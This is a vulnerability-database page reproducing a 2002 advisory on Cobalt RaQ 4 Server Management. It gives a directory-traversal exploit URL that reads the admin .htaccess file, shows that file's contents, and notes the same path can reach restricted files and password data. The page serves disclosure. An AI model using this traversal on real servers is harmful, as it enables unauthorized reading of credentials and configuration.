PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
INFO
------oOo---------------- Cobalt RAQ 4 Server Management, Cross Site Scripting , Directory Traversal & DoS Vulnerabilities. ------oOo---------------- Company Affected: www.cobalt.com & www.sun.com Version: RAQ 4 Server Management. Dowload: http://www.cobalt.com/products/raq/index.html OS Affected: Linux ALL, Solaris ALL. Author: ** Alex Hernandez <email protected> ** Thanks all the people from Spain and Argentina. ** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti. ----=Brief Description=------------ Traversal File configuration. Exploit: http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess # Access file for /usr/admserv/html/.cobalt/admin/ (admin ) order allow,deny allow from all require user admin Authname CobaltRaQ Authtype Basic Directory by Default on server is: "/usr/admserv/html/.cobalt/admin" u can translate to any directory for capture restricted files or passwords and profiles the users. Vendor Response: The vendor was notified Posted List^s Security cobalt: email protected & email protected http://www.cobalt.com Alex Hernandez <email protected> (c) 2002. ------oOo------------------------------------
pwnwiki.com
